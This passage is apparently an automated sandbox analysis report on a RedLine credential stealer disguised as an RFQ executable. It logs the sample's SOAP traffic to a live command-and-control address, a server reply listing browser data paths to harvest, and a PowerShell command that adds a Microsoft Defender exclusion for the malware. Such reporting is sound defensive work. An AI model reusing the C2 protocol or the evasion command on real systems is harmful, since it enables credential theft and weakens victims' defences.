                                                                                          Nov 18, 2024 17:34:13.190494061 CET4971713484192.168.2.5193.70.111.186
                                                                                          Nov 18, 2024 17:34:13.190794945 CET1348449717193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:13.190846920 CET4971713484192.168.2.5193.70.111.186
                                                                                          Nov 18, 2024 17:34:13.195231915 CET1348449717193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:13.195306063 CET1348449717193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:13.195327997 CET1348449717193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:13.195338011 CET1348449717193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:13.195348978 CET1348449717193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:13.195400953 CET1348449717193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:13.195619106 CET1348449717193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:13.241101027 CET1348449717193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:14.162611961 CET1348449717193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:14.203552008 CET4971413484192.168.2.5193.70.111.186
                                                                                          Nov 18, 2024 17:34:14.203778028 CET4971713484192.168.2.5193.70.111.186

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Nov 18, 2024 17:34:08.477482080 CET6044553192.168.2.51.1.1.1

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Nov 18, 2024 17:34:08.477482080 CET192.168.2.51.1.1.10x8904Standard query (0)api.ip.sbA (IP address)IN (0x0001)false

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Nov 18, 2024 17:34:08.490418911 CET1.1.1.1192.168.2.50x8904No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false

                                                                                          HTTP Request Dependency Graph

                                                                                          • 193.70.111.186:13484

                                                                                          HTTP Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.549704193.70.111.186134843168C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 18, 2024 17:34:01.866641045 CET241OUTPOST / HTTP/1.1
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                          Host: 193.70.111.186:13484
                                                                                          Content-Length: 137
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Connection: Keep-Alive
                                                                                          Nov 18, 2024 17:34:02.693150043 CET359INHTTP/1.1 200 OK
                                                                                          Content-Length: 212
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                          Date: Mon, 18 Nov 2024 16:34:01 GMT
                                                                                          Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                          Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                                                          Nov 18, 2024 17:34:07.762092113 CET224OUTPOST / HTTP/1.1
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                                          Host: 193.70.111.186:13484
                                                                                          Content-Length: 144
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Nov 18, 2024 17:34:08.076047897 CET368OUTPOST / HTTP/1.1
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                                          Host: 193.70.111.186:13484
                                                                                          Content-Length: 144
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                          Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettings xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                                                                                          Nov 18, 2024 17:34:08.431598902 CET1236INHTTP/1.1 200 OK
                                                                                          Content-Length: 4744
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                          Date: Mon, 18 Nov 2024 16:34:08 GMT
                                                                                          Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                                                                                          Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string [TRUNCATED]


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          1192.168.2.549714193.70.111.186134843168C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 18, 2024 17:34:11.786926985 CET221OUTPOST / HTTP/1.1
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                                          Host: 193.70.111.186:13484
                                                                                          Content-Length: 35640
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Nov 18, 2024 17:34:12.825676918 CET294INHTTP/1.1 200 OK
                                                                                          Content-Length: 147
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                          Date: Mon, 18 Nov 2024 16:34:12 GMT
                                                                                          Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                          Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          2192.168.2.549717193.70.111.186134843168C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 18, 2024 17:34:12.832226992 CET241OUTPOST / HTTP/1.1
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                          Host: 193.70.111.186:13484
                                                                                          Content-Length: 35632
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Connection: Keep-Alive
                                                                                          Nov 18, 2024 17:34:14.162611961 CET408INHTTP/1.1 200 OK
                                                                                          Content-Length: 261
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                          Date: Mon, 18 Nov 2024 16:34:14 GMT
                                                                                          Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                          Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                                                          Statistics

                                                                                          CPU Usage

                                                                                          Click to jump to process

                                                                                          Memory Usage

                                                                                          Click to jump to process

                                                                                          High Level Behavior Distribution

                                                                                          Click to dive into process behavior distribution

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          General

                                                                                          Target ID:0
                                                                                          Start time:11:33:55
                                                                                          Start date:18/11/2024
                                                                                          Path:C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe"
                                                                                          Imagebase:0x2dba8a00000
                                                                                          File size:2'875'465 bytes
                                                                                          MD5 hash:51E2A4CF52A06BFF7B50826173D6A0AD
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2323017315.000002DBAA7A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:2
                                                                                          Start time:11:33:58
                                                                                          Start date:18/11/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe" -Force
                                                                                          Imagebase:0x7ff7be880000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:3
                                                                                          Start time:11:33:58
                                                                                          Start date:18/11/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6d64d0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:4
                                                                                          Start time:11:33:58
                                                                                          Start date:18/11/2024
                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                          Wow64 process (32bit):
                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                                                                                          Imagebase:
                                                                                          File size:45'984 bytes
                                                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:5
                                                                                          Start time:11:33:58
                                                                                          Start date:18/11/2024
                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                          Imagebase:0x10000
                                                                                          File size:108'664 bytes
                                                                                          MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.2221153349.00000000028AF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2218838757.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.2218838757.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000005.00000002.2218838757.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:6
                                                                                          Start time:11:33:58
                                                                                          Start date:18/11/2024
                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          Wow64 process (32bit):
                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                          Imagebase:
                                                                                          File size:108'664 bytes
                                                                                          MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:7
                                                                                          Start time:11:33:58
                                                                                          Start date:18/11/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6d64d0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:10
                                                                                          Start time:11:33:59
                                                                                          Start date:18/11/2024
                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 5276 -s 1056
                                                                                          Imagebase:0x7ff749f20000
                                                                                          File size:570'736 bytes
                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Disassembly

                                                                                          Reset < >

                                                                                            Executed Functions

                                                                                            Function 00007FF848FD0000 Relevance: 2.3, Instructions: 2290COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2328380573.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848fd0000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 497dd28c6f2d05aa2d8d71414b8e85a4cc302358057de6e2f7992c2a0ecce9b0
                                                                                            • Instruction ID: 9d6919082891864a0b4c41af99eef5c6f0c2ae582c489aa09680d8f0f82d15d2
                                                                                            • Opcode Fuzzy Hash: 497dd28c6f2d05aa2d8d71414b8e85a4cc302358057de6e2f7992c2a0ecce9b0
                                                                                            • Instruction Fuzzy Hash: B4E23972C0DACA8FE756FB2898555A47FE0FF96340F0901FAC58ACB1D3DA286846C745
                                                                                            Function 00007FF848F01D10 Relevance: 2.0, Strings: 1, Instructions: 739COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: d
                                                                                            • API String ID: 0-2564639436
                                                                                            • Opcode ID: 92545ec4a03acc379d43edf7593b5b5d94637e29eae70231e230211d3c6cb9ce
                                                                                            • Instruction ID: 44a3791e706811cc4cb43a48ba61fcc3f6840fb99abc6429584febec995ee1af
                                                                                            • Opcode Fuzzy Hash: 92545ec4a03acc379d43edf7593b5b5d94637e29eae70231e230211d3c6cb9ce
                                                                                            • Instruction Fuzzy Hash: 87223331A1CA4A4FE359EB2C94855B177E0FF96354F1442BAC48AC72D7EF28F8428785
                                                                                            Function 00007FF848F0D999 Relevance: 1.5, Instructions: 1532COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 98d2dcfe31f483346c695dfa3b2c19b8d4588a47e9610262109fd7e73caa1ce4
                                                                                            • Instruction ID: f1cbfb0653b7d7f52628a608d3298ae15c73f1332053ebc2227ceb07f1b3424e
                                                                                            • Opcode Fuzzy Hash: 98d2dcfe31f483346c695dfa3b2c19b8d4588a47e9610262109fd7e73caa1ce4
                                                                                            • Instruction Fuzzy Hash: 02B21330A1CB854FD359EB2884914B5B7E2FF96341F1446BEE48AC72D6EB34E846C781
                                                                                            Function 00007FF848F02E80 Relevance: 1.2, Instructions: 1156COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: be7272cdf4805c7497a5ced90c522d0ca37985ae993893e3d215543578aa2369
                                                                                            • Instruction ID: f33178ab3a64386770d35097c64e435a1911a80bba908e9caffe27090911d1a7
                                                                                            • Opcode Fuzzy Hash: be7272cdf4805c7497a5ced90c522d0ca37985ae993893e3d215543578aa2369
                                                                                            • Instruction Fuzzy Hash: 81826831A0C6868FE71A9B2484516B47BE1FF92350F5441BED48ECB9D7DF28AC86C784
                                                                                            Function 00007FF848F07B60 Relevance: .8, Instructions: 843COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 96a0a4a819a88fd608a6b8dbea81590c2d54cd9bdf8eb626357e49f0ea4cbdac
                                                                                            • Instruction ID: b125c10d413187b6f136519e6ab7a23a53da842143e2dda762b3d7bccb905664
                                                                                            • Opcode Fuzzy Hash: 96a0a4a819a88fd608a6b8dbea81590c2d54cd9bdf8eb626357e49f0ea4cbdac
                                                                                            • Instruction Fuzzy Hash: 6D42E530A1DA098FDB68EB28D455A7977E1FF56341F1401BEE48EC72D2EF24AC428745
                                                                                            Function 00007FF848F0AA30 Relevance: .4, Instructions: 387COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d42c2578d6139a73145ac996bc3c1988ed4bb60d52a597f1fba3d6716bca61ef
                                                                                            • Instruction ID: 955bb26fa287221d0c99e51ddf4837d8c2f5a6417baf7c905dee451faeddcc7c
                                                                                            • Opcode Fuzzy Hash: d42c2578d6139a73145ac996bc3c1988ed4bb60d52a597f1fba3d6716bca61ef
                                                                                            • Instruction Fuzzy Hash: 9DC16B3091CB8A4FE31DDB298495075B7E2FFD6202F1486BED4C6C31D6EB28A486C785
                                                                                            Function 00007FF848F02F6D Relevance: .3, Instructions: 271COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3f3562df80c5a584a28fae910bb235a29982b428698e825938c3defc4d083ec7
                                                                                            • Instruction ID: 3274b0b9c8e517abd9ecd75a838f36b805efbaf0d2c33dd95c32293fa5cd26e7
                                                                                            • Opcode Fuzzy Hash: 3f3562df80c5a584a28fae910bb235a29982b428698e825938c3defc4d083ec7
                                                                                            • Instruction Fuzzy Hash: 4A71B631B1CA094FD758FB6C94554BA73E1FB99350F10453EE58BC32D6EF24E8428685
                                                                                            Function 00007FF848F13701 Relevance: .2, Instructions: 180COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1a3298844615e96ab2c03463549c803b937d02786ac53577b2edc08051737869
                                                                                            • Instruction ID: 463e2e65daf4e5c4ffadc4148443cc5e76040c0b6fa81266d7e6d25fb904db96
                                                                                            • Opcode Fuzzy Hash: 1a3298844615e96ab2c03463549c803b937d02786ac53577b2edc08051737869
                                                                                            • Instruction Fuzzy Hash: 0D414831A0D7891FD71E9A3888261B57FA1EB87220B1582BFD087CB6E7DD1868078395
                                                                                            Function 00007FF848F1374E Relevance: .2, Instructions: 168COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0310447bd0b65d5be2388b4e3f46241f3ddd56550bdf82146f88a8a5bcc9c9d8
                                                                                            • Instruction ID: 7d076a52912529727128672089777380b8640dd194263af88478771ba4d68b7f
                                                                                            • Opcode Fuzzy Hash: 0310447bd0b65d5be2388b4e3f46241f3ddd56550bdf82146f88a8a5bcc9c9d8
